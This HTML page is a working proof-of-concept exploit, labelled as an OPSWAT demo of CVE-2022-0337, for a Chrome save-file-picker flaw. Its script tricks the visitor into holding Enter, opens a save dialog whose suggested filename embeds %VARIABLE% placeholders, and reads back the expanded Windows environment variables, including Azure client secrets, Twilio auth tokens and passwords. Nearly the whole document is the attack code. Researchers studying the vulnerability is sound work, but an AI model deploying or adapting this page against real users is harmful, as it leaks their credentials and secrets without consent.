<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Demo CVE-2022-0337 - OPSWAT</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            background-color: #f0f0f0;
        }

        .container {
            text-align: center;
            padding: 20px;
            border-radius: 10px;
            background-color: #fff;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
        }

        #pixel {
            padding: 10px 20px;
            font-size: 18px;
            border: none;
            /* background-color: #007bff; */
            color: #fff;
            border-radius: 5px;
            cursor: pointer;
            /* transition: background-color 0.3s; */
        }

        #userInfo {
            margin-top: 20px;
            font-size: 16px;
            color: #333;
        }

        #gameover {
            margin-top: 20px;
            font-size: 18px;
            color: red;
        }

        #author {
            font-size: 14px;
            color: #666;
            margin-top: 10px;
        }

        #instruction {
            font-size: 18px;
            margin-bottom: 20px;
        }
    </style>
</head>
<body>
    <div class="container">
        <h1>Demo CVE-2022-0337 - OPSWAT</h1>
        <div id="author">Created by Đặng Dương Minh Nhật & Trần Huỳnh Trang</div>
        <p id="instruction">Hold the Enter button for at least 2 seconds</p>
        <div id="pixel"></div>
        <div id="userInfo"></div>
        <div id="gameover"></div>
    </div>

    <script>
        let countEnter = 0;
        let isDownloaded = false;

        window.onload = function () {
            const body = document.querySelector('body')
            const pixel = document.querySelector('#pixel')

            body.onkeydown = e => (e.key == "Enter") ? clickedEnter() : 1;
            body.onkeyup = e => (e.key == "Enter") ? cancelEnter() : 1;

            const randomNumber = Math.floor(Math.random() * 990) + 1;
            const filename = `f${randomNumber}.f`

            const environmentVariables = [
                'USERNAME',
                'USERDOMAIN',
                'SESSIONNAME',
                'COMPUTERNAME',
                'KEY_VAULT_URL',
                'SECRET_NAME',
                'AZURE_TENANT_ID',
                'AZURE_CLIENT_ID',
                'AZURE_CLIENT_SECRET',
                'TWILIO_ACCOUNT_SID',
                'TWILIO_AUTH_TOKEN',
                'TOKEN',
                'PASSWORD'
            ]

            const suggestedName = environmentVariables.map(x => `%${x}%`).join('@') + filename;

            pixel.addEventListener('click', async () => {
                const handle = await window.showSaveFilePicker({ suggestedName });
                const username = handle.name.split('@')[0];

                const userInfo = handle.name.replaceAll(filename, '').split('@').map((x, i) => `${environmentVariables[i]} = ${x.includes('%') ? 'null' : x}`).join('<br>');
                document.querySelector("#userInfo").innerHTML = `USER'S ENVIRONMENT VARIABLES: <br>${userInfo} <br> guessWinPath = C:/users/${username}`;
                document.querySelector("#gameover").textContent = "Need refresh to start again"
            })
        };

        function clickedEnter() {
            countEnter++;
            if (countEnter > 5 && !isDownloaded) {
                pixel.click()
                isDownloaded = true;
            }
        }

        function cancelEnter() {
            countEnter = 0;
        }
    </script>
</body>
</html>
